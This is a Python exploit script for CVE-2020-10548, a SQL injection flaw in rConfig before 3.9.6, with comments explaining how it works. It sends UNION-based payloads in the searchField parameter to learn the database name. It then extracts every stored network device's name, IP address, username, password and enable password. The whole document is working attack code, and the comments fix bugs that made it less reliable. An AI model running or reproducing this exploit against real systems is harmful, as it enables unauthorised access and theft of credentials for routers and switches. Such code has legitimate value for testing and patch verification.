CVE-2020-10548.py
#!/usr/bin/python3
# CVE-2020-10548
# author https://github.com/theguly/
#
# This technique is very similar to the one v1k1ngfr already published for CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig).
# As he documented, because of the PDO DB class mishandling, you could also stack a second query containing a plain INSERT and achieve authentication bypass by creating a new user.
#
# I wanted a separate Python script for each CVE so the GitHub listing stays tidy.
# I'd prefer an all-in-one script with proper alignment of the different UNION arguments, but I don't expect to use this script again, so I'll live with it.
#
# tested with rConfig < 3.9.6
import sys
import requests
import urllib3
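urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Injection point: the `searchField` value is placed into the SQL query
# unescaped. The single quote after "antani" closes the original string
# literal and `%s` is where the UNION payload is substituted (see `url % payload`).
burl = """/devices.inc.php?search=True&searchField=antani'+%s&searchColumn=n.id&searchOption=contains"""
# Column count the UNION is padded to (one data column + ulen-1 NULLs). A UNION
# must match the column count of the query it is appended to; 10 is what worked
# on the versions listed in the header -- adjust if the target's query differs.
ulen = 10

if len(sys.argv) < 2:
    print('use: ./{} target'.format(sys.argv[0]))
    print('./{} https://1.2.3.4/'.format(sys.argv[0]))
    # Non-zero status so a wrapper can distinguish "no target given" from success.
    sys.exit(1)

# Drop a trailing slash so both "https://host/" and "https://host/app" produce a
# single-slash path rather than "//devices.inc.php".
url = sys.argv[1].rstrip('/') + burl

s = requests.Session()
# Certificate verification is disabled so self-signed lab targets work.
# NOTE: this also lets an on-path attacker read everything this session
# retrieves (the device credentials being dumped) -- run it from a trusted network.
s.verify = False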
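def getInfo(purl, *, timeout=30):
    """Fetch `purl` and return the text between the two ``[PWN]`` markers.

    Every injected payload wraps the value it exfiltrates in a literal
    ``[PWN]`` marker on each side, so the data is whatever lies between the
    first and second marker in the response body.

    Args:
        purl: full URL including the injected payload.
        timeout: seconds to wait for connect/read before giving up. Without
            one a stalled target (or a WAF that tarpits) hangs the script forever.

    Returns:
        The extracted string, or False when the marker is absent (SQL error,
        no row at that offset, or the target is not vulnerable).

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    r = s.get(purl, timeout=timeout)
    body = r.text
    if '[PWN]' not in body:
        return False
    # With the marker present, split() yields at least two parts, so index 1
    # always exists: it is the text between the first and second marker.
    return body.split('[PWN]')[1]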
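def askContinue(msg, *, reply=None):
    """Prompt the operator and exit unless they agree to go on.

    Args:
        msg: question to show; " (Y/n)" is appended, so a bare Enter means "yes".
        reply: answer to use instead of reading stdin (useful for testing).

    Raises:
        SystemExit: when the answer, trimmed and lower-cased, starts with 'n'
            (e.g. "n", "no", " No ").
    """
    if reply is None:
        reply = input('[-] ' + msg + ' (Y/n)')
    # Only a leading 'n' counts as "no". The previous check (`'n' in answer`)
    # also aborted on affirmative replies such as "continue" or "yes, go on".
    if reply.strip().lower().startswith('n'):
        sys.exit()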
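# --- step 1: find the current database name -------------------------------
print("[+] extracting rconfig db: ", end='')
# 0x223E3C42523E5B50574E5D decodes to '"><BR>[PWN]' and 0x5B50574E5D3C42523E to
# '[PWN]<BR>': the hex-encoded markers getInfo() looks for (hex avoids quotes in
# the payload). The scalar subquery fills column 1; the rest are padded with NULL.
payload = "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)" + ",NULL" * (ulen - 1) + "+--+"
purl = url % payload
dbname = getInfo(purl)
print(dbname)
if not dbname:
    # Without a database name the node query below cannot be built; the
    # unguarded version crashed here with a TypeError on str + False.
    print("[-] could not extract the database name: target not vulnerable, or the UNION column count (ulen) is wrong")
    sys.exit(1)

# --- step 2: dump every node: ip, username, password, enable password ------
print("[+] dumping nodes: ")
print('devicename:ip:username:password:enablepass')
print('------------------------------------------')
i = 0
while True:
    # Pause every 10 rows so a large inventory can be stopped early.
    if i > 0 and not i % 10:
        askContinue('Continue?')
    # One row per request: LIMIT <offset>,1. The original used "limit i,i+1",
    # i.e. a row COUNT of i+1, so for i>=1 the scalar subquery returns several
    # rows whenever at least i+2 nodes exist -- a MySQL error, which surfaces
    # here as a missing marker and looks like "no more devices".
    # NOTE: dbname comes straight from the target's response and is neither
    # escaped nor URL-encoded; fine for a plain identifier, but a hostile
    # server could return something that breaks the query.
    payload = (
        "union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"
        + dbname + ".nodes+limit+" + str(i) + ",1)"
        + ",NULL" * (ulen - 1) + "+--+"
    )
    purl = url % payload
    n = getInfo(purl)
    if not n:
        # No marker: most likely past the last row, but it could also be a
        # transient error, so let the operator decide instead of guessing.
        askContinue('it could be possible that we don\'t have more devices. continue?')
    else:
        # Only print real rows; the old code also printed a literal "False".
        print(n)
    i = i + 1
sys.exit()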